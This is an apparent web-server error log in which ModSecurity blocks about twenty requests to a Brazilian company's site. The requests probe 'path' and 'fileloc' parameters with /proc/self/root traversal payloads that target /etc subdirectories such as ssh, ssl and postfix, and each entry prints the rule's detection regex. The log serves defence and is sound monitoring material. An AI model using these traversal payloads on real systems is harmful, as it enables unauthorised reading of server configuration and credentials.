[Tue Mar 17 09:51:16.804972 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.241.46:44696] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablORO82sZHvlq4xgHrFnAAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:51:21.579925 2026] [:error] [pid 11469:tid 140411699963648] [client 74.7.241.46:49256] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOSZDEJR9VXonE_-1SXwAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:51:32.036223 2026] [:error] [pid 2553:tid 140411599251200] [client 74.7.241.46:49258] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOVP0Bec_B9OkZP_i_wgAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:51:34.481069 2026] [:error] [pid 1210:tid 140411565680384] [client 74.7.241.46:46040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOVlKJy4A1bGlmj9BYTAAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:51:39.636144 2026] [:error] [pid 2325:tid 140411590858496] [client 74.7.241.46:46046] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOW-82sZHvlq4xgHrFpQAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:51:54.924465 2026] [:error] [pid 1016:tid 140411716749056] [client 74.7.243.203:40448] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOapqmL8PQht4WJFlLawAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:51:58.368999 2026] [:error] [pid 1016:tid 140411683178240] [client 74.7.243.203:42872] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablObpqmL8PQht4WJFlLcQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:52:02.185098 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.243.203:42888] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOcqBJNF7axNlVR0X_ygAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:03.507285 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.243.203:52022] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOc9CmCSWTlPouqorO2wAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:04.892634 2026] [:error] [pid 2325:tid 140411674785536] [client 74.7.243.203:52034] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOdO82sZHvlq4xgHrFtQAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:06.279564 2026] [:error] [pid 1731:tid 140411699963648] [client 74.7.243.203:52046] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOdgb2qCuy5irgBMjL1QAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:07.598937 2026] [:error] [pid 1210:tid 140411691570944] [client 74.7.243.203:52060] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOd1KJy4A1bGlmj9BYdAAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:08.989188 2026] [:error] [pid 11469:tid 140411632822016] [client 74.7.243.203:52064] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOeJDEJR9VXonE_-1ScwAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:09.974656 2026] [:error] [pid 1210:tid 140411716749056] [client 74.7.241.46:54700] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOeVKJy4A1bGlmj9BYegAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:10.285618 2026] [:error] [pid 1210:tid 140411607643904] [client 74.7.243.203:42350] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOelKJy4A1bGlmj9BYewAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:11.605572 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.243.203:42352] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOe6BJNF7axNlVR0X_0QAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:13.190298 2026] [:error] [pid 2159:tid 140411733534464] [client 74.7.243.203:42358] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOffct6CQ8jnRyg2p-zQAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:14.582735 2026] [:error] [pid 1210:tid 140411716749056] [client 74.7.243.203:42360] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOflKJy4A1bGlmj9BYgAAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:15.739787 2026] [:error] [pid 1210:tid 140411716749056] [client 74.7.241.46:36026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOf1KJy4A1bGlmj9BYgwAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:52:17.352631 2026] [:error] [pid 17965:tid 140411725141760] [client 74.7.243.203:42374] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOf6t8Nd0UC_OcbVGx9gAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:18.692232 2026] [:error] [pid 17965:tid 140411699963648] [client 74.7.243.203:42380] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOgqt8Nd0UC_OcbVGx-gAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:19.974012 2026] [:error] [pid 1016:tid 140411683178240] [client 74.7.243.203:42382] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 